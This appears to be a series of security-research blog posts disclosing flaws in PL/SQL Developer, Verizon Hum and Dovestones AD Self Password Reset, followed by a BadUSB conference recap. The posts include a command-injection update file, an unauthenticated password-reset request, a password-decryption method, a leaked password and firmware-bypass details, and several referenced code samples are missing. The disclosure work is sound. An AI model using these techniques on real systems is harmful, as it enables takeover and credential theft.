PL/SQL Developer: HTTP to Command Execution

While looking into PL/SQL Developer – a very popular tool for working with Oracle databases – to see how it encrypts passwords, I noticed something interesting. When testing Windows applications, I make it a habit to keep Fiddler running to see if there is any interesting traffic – and in this case, there certainly was.

PL/SQL Developer has an update mechanism which retrieves a file containing information about available updates to PL/SQL Developer and other components; this file is retrieved via HTTP, meaning that an attacker in a privileged network position could modify this file.

This file is retrieved each time the application starts; if a version listed in the file is greater than the version installed, the user will be prompted to upgrade (this is the default behavior – if disabled, the user isn’t prompted until they select Help | Check Online Updates). The user then has the following options:

  • Update: If a URL is provided, the application will download a file (also over HTTP), and apply the update. If no URL is provided, the option is not presented to the user.
  • Download: Executes the URL provided, so that the user’s browser opens and immediately downloads the file. This is typically an executable (*.exe); as is the case elsewhere, the file is retrieved over HTTP, and no validation is performed.
  • Info: If the value is a URL, it’s executed so that the user’s browser opens to the specified URL; otherwise the content is displayed in a message box.

There are (at least) two issues here:

  • Redirect to malicious download: as the user is likely unaware that they shouldn’t trust the file downloaded via the Download option, an attacker could replace the URL to point to a malicious file, or simply leverage their privileged position to serve a malicious file from the legitimate URL.
  • Command execution: when the user selects the Download option, the value in the file is effectively passed to ShellExecute without any validation – there is no requirement that it be a URL. If a command is inserted, it will be executed in the context of the user.

This means that a user who believes they are downloading an update may actually be handing full control over to an attacker. Not bothering to use HTTPS to secure traffic gives an attacker multiple ways to gain control of the user’s PC – a great example of why HTTPS matters for all traffic: it’s not just about privacy, it’s also critical for integrity.

The tested version of PL/SQL Developer was 11.0.4, though the issue likely well predates that version. The vendor reports that this issue has been addressed by enforcing HTTPS on their website, along with application changes made in version 11.0.6. It is recommended that all users update to the latest version.

Vulnerability Note: VU#229047
CVE: CVE-2016-2346

Technical Details

The update file is retrieved over HTTP – the request issued by the application looks like this:

Here’s what a response looks like – it’s an INI-like file; the Download value is the item we care about most here:

By changing the returned file, replacing this line:


with this:


When the user selects the Download option, calc.exe will be executed.

Here is an example of a pls.updates file that demonstrates this flaw. The key changes are: increasing the Version, so that the user will see it as an update; clearing the Update value, so that the only option is Download; and setting Download to the command that you wish to be executed:
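As an illustration only – the key names below (Version, Update, Download, Info) follow the options described above, but the exact layout of a real pls.updates file may differ:

```ini
; Illustrative sketch only - key names taken from the options described
; above; a real pls.updates file may use a different layout.
Version=9999
Update=
Download=calc.exe
Info=A new version of PL/SQL Developer is available
```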

Special Thanks

Thanks to Garret Wassermann of CERT/CC for his assistance and Allround Automations for addressing the issue.

PL/SQL Developer: Nonexistent Encryption

(See here for another issue discovered during this research: Updates over HTTP & Command Execution.)

PL/SQL Developer by Allround Automations has an option to store the user’s logon history with passwords – the passwords are encrypted with a proprietary algorithm. At this point, you should know how this is going to go.

For those who don’t know, PL/SQL Developer is a tool for developers and database administrators to access Oracle – an essential tool in many enterprise environments. Instead of using something that provides actual security, like DPAPI (which itself is far from perfect, as we saw with the UPEK fiasco), they opted for a proprietary “encryption” algorithm to protect these passwords – making it trivial to recover the passwords for any attacker that can access the preferences file(s).

Some time ago I asked the vendor about the security of the password storage – they are aware of the lack of security, but don’t make it clear to their customers.

The fact that they are aware it isn’t secure, yet have let the issue exist for years – and have never made clear to users what they are risking by activating the option – is extremely disappointing. Vendors have a responsibility to protect customer information, and broken features like this completely ignore that responsibility.

The Algorithm

The encryption algorithm is quite simple, primarily consisting of a bit shift and xor – let’s take a closer look at how it works. The ciphertext produced looks like this:


The first group of four digits (2736) is the key – it’s generated based on the system uptime, producing an integer between 0 and 999, to which 2,000 is added. This means that the key has 1,000 possible values, or just under 10 bits. Of course, when you store the key with the encrypted data, key size really doesn’t matter.

After the key at the beginning, each group of four digits represents one byte – this simple code is all that’s needed to encrypt:

When you encrypt the string user/password@server, here’s what the encrypted data breaks down to:

  • 2736 = Key
  • 4562 = u
  • 4572 = s
  • 4230 = e
  • 4576 = r
  • 3066 = /
  • 4564 = p
  • 4302 = a
  • 4120 = s
  • 4130 = s
  • 4172 = w
  • 4566 = o
  • 4080 = r
  • 4442 = d
  • 4900 = @
  • 4190 = s
  • 4328 = e
  • 4194 = r
  • 4076 = v
  • 4390 = e
  • 4160 = r

The Data

The login information is stored in an INI-like file called user.prefs – under the headings of [LogonHistory] and [CurrentConnections]; storage of passwords is an option that is turned off by default, though storage of history is turned on by default. All data stored in these sections is encrypted using this method, so the presence of data in these sections does not necessarily mean that passwords are present.

These files can be stored in a number of locations (the latter are more common with older versions of the application):

  • C:\Users\<username>\AppData\Roaming\PLSQL Developer\Preferences\<username>\
  • C:\Program Files\PLSQL Developer\Preferences\<username>\
  • C:\Program Files (x86)\PLSQL Developer\Preferences\<username>\

The data format for the two sections is somewhat different. In [LogonHistory], the data is in the following format:


In [CurrentConnections], the format is <username>,<password>,<server>,,,; the login can also be stored in C:\Users\<username>\AppData\Roaming\PLSQL Developer\PLS-Recovery\*.cfg, in this same format.

This encryption method is also used in other files, though in less predictable locations.

The Proof of Concept

We have released a proof of concept tool to decrypt these logins, and as is typical, it’s open source. Simply run the executable from the command line, and it will search for the preference files and print any information it’s able to retrieve.

You can also pass in the name of a remote machine, and it will attempt to use the administrative (c$) share.


Special thanks to my frequent research partner, Brandon Wilson, for his help with this project.

Verizon Hum Leaking Credentials

or, Christmas Infosec Insanity…

A friend mentioned Hum by Verizon, a product that I hadn’t heard of but that quickly caught my attention – both from a “here’s a privacy nightmare” perspective and an “I might actually use that” perspective. While looking at the site, I decided to take a look at the source code for the shopping page – what I saw was rather unexpected.

Near the top is a large block of JSON assigned to an otherwise unused variable named phpvars – included was some validation code, a number of URLs, some HTML, and the like. After seeing the first element, isDeveloperMode, I was sure this was worth a closer look.

A few lines in, I ran across something that I would have never expected from a company like Verizon:

Username, password. Embedded in JavaScript. Seriously.

In the JSON, there are several API endpoints listed, from a variety of domains (only one of which is publicly resolvable):


Whether any of these endpoints would allow an outside attacker to gather private data, I can’t say.

There are a few things about this that really surprise me:

  • How did Verizon allow this to go live?
  • Why aren’t they doing any type of post-deployment testing?
  • Weblogic12 – Seriously? Is that really an acceptable password?

The use of stolen and/or misused credentials (user name/passwords) continues to be the No. 1 way to gain access to information. Two out of three breaches exploit weak or stolen passwords, making a case for strong two-factor authentication. – Verizon Data Breach Investigations Report

I’ve reached out to Verizon via Twitter to ensure that they are aware that this information is being leaked. I attempted to email both and – neither of which are valid addresses (another surprise from a company that should have a clue).

Dovestones Software AD Self Password Reset (CVE-2015-8267)

AD Self Password Reset v3.0 by Dovestones Software contains a critical vulnerability in its password change functionality that allows unauthenticated users to change the password of arbitrary accounts.

The vendor has been working with customers to upgrade them to a fixed version.

The /Reset/ChangePass function doesn’t validate that the validation questions have been answered, or that the account in question is enrolled. This allows an attacker to reset any account that the service account is able to reset, even if the account isn’t enrolled.

The PasswordReset.Controllers.ResetController.ChangePasswordIndex() method in PasswordReset.dll fails to properly validate the user, and performs the password reset on arbitrary accounts.
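To illustrate the class of issue, a request along the following lines would reach the vulnerable method without any authentication. The /Reset/ChangePass path comes from the description above, but the host and form-field names are hypothetical – the exact request format isn’t documented here:

```python
# Illustrative sketch only: the /Reset/ChangePass path is from the
# advisory; the host and form-field names below are hypothetical.
import urllib.parse
import urllib.request

target = "https://passwordreset.example.com/Reset/ChangePass"  # hypothetical host

# No session, no answers to the validation questions - the vulnerable
# ChangePasswordIndex() method performs the reset anyway.
data = urllib.parse.urlencode({
    "username": "victim",               # hypothetical field name
    "newPassword": "AttackerChosen1!",  # hypothetical field name
}).encode()

request = urllib.request.Request(target, data=data, method="POST")
# urllib.request.urlopen(request)  # not executed here - illustration only
```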


Successful response:

VU#757840 – Dovestones Software AD Self Password Reset fails to properly restrict password reset request to authorized users

CVE: CVE-2015-8267



Dovestones Software AD Self Password Reset fails to properly validate users, which enables an unauthenticated attacker to reset passwords for arbitrary accounts.


CWE-284: Improper Access Control – CVE-2015-8267

Dovestones Software AD Self Password Reset contains a vulnerable method PasswordReset.Controllers.ResetController.ChangePasswordIndex() in PasswordReset.dll that fails to validate the requesting user. An attacker can reset passwords for arbitrary accounts by manipulating web application requests that call the vulnerable method.


A remote, unauthenticated attacker can reset passwords for arbitrary accounts where usernames are known or can be guessed.


Apply an update

The vendor has worked directly with customers to apply updates for this and other vulnerabilities. Users who have not received an update are encouraged to contact the vendor.



Thanks to Adam Caudill for reporting this vulnerability.

This document was written by Joel Land.

Special thanks to Dovestones for their quick response, and US CERT for their help in coordinating disclosure.

Making BadUSB Work For You – DerbyCon

Last week Brandon Wilson and I were honored to speak at DerbyCon, on the work we’ve been doing on the Phison controller found in many USB thumb drives. This was my first time speaking at DerbyCon – it’s a great event, with a fantastic team making the magic happen.


Video (which I haven’t been able to bring myself to watch):

Now that the dust has settled, I would like to provide some updates, thoughts, and extra information – and maybe correct an error I made during the presentation.

The Demos

We did three demos – they were simple enough that I didn’t think there was any risk of having issues. Well, lesson learned.

The machine we used was a fresh Windows install done just for the talk – though in the rush, there were a couple of differences between it and the machine we had been testing with. In the panic of trying to fit the talk into the short 25-minute slot, I mistook these differences for a failure of one of the demos.

Custom HID Firmware

The first of the three demos was completely custom firmware that presents itself as an HID device (and as a mass storage device, though without media present – this makes firmware updates easier). The demo went without a hitch.

I would have liked to show the tools and the update process, though there just wasn’t time. Brandon is working on videos, to be posted to YouTube, that walk through each demo step by step.

The team behind the Rubber Ducky saved us a lot of time, thanks to the tools they had built – as we were able to support the same encoded format they used.

Hidden Partition

The hidden partition is a great patch, as there’s no way to tell that it’s there – everything works as expected, no reason to suspect that anything has been altered.

It divides the NAND space into two partitions, and the firmware lies about the size, indicating that only half of the space is there. The “public” partition is the first to be mounted, and only a specific action will cause the second, hidden partition to become visible.

It’s a simple change, but it sends a clear message that there can be more than meets the eye with these devices. From a forensics perspective, the only way to ensure that what you are getting is accurate and complete, is to dump the NAND directly – without allowing the controller to access it.

Password Protection Bypass

This demo seemed to go wrong, but it actually performed perfectly – I was just in too much of a rush to think through what was happening, and why I didn’t see what I expected.

When I plugged the device in, I was expecting to see two drives from it – one “public”, the other unmounted. I only saw one. Two things went wrong here:

  • “Show Empty Drives In Explorer” – By default, Windows doesn’t show unmounted removable drives in “My Computer”; this is a setting I always change, so I expected to see the unmounted drive. As this was a fresh install, the default setting was still in place – the drive was there, I just couldn’t see it. This threw me off.
  • Wrong Password – During the demo I typed some random junk into the password field of the “Lock” tool, and instead of unlocking the drive as expected, it gave me the wrong-password dialog. The issue here is a bug in the Phison code: when a password longer than 16 characters is supplied, it’s treated as a bad password. So the patch was working – the password I supplied was simply too long, triggering that bug.

We later tested that drive again, and sure enough – it worked flawlessly, as long as the random password wasn’t longer than 16 characters.

The patch works by altering the buffer that stores the password once it’s received over USB; it forces the buffer to 16 “A”s, so that any password will work. Because of how it works, the patch must be applied before the user sets their password – otherwise it’ll just make the data inaccessible.

That was painful.

The (maybe) error…

During the talk I referred to modes 7 and 8 as being encrypted – this is probably wrong, at least on the devices we demoed. The two modes are password protected; according to some documentation they are encrypted, and according to other documentation they aren’t.

The question came up in a conversation after the talk – we’ve not had the time to dig into this feature more since then, but it’s looking like it’s just a password check with no encryption.

The password patch was added at the last minute, to replace another demo that we didn’t like – we identified the USB command being sent, and patched it. Due to time constraints, we didn’t dig into the feature to verify that the document (from a device manufacturer) was correct; after the question was raised, we dug into it a little more and looked for other documentation and code to support the claim – it looks like the document we were referencing was incorrect.

So, it looks like I misspoke – the patch still works as expected, though the feature itself seems to provide less protection than we initially thought. Sorry!

The Code & Docs

We have everything on the repo now, and we’ve added some additional documentation to the wiki.

This isn’t simple to do – the code is complicated to write, and the effort to use the patches and custom firmware is a bit more than I’d like. We’ve tried to document things as well as we can, hopefully it’s easy enough to understand.

Next Steps

We really hope that releasing this will push device manufacturers to insist on signed firmware updates, and that Phison will add support for signed updates to all of the controllers it sells.

Phison isn’t the only player here, though they are the most common – as the most common provider of these controllers, they have an opportunity to stand up, protect users, and lead the industry in improving the security of these devices.

What we’ve released just scratches the surface of what can be done here – until signed updates are enforced, there’s no telling what games these devices could be playing.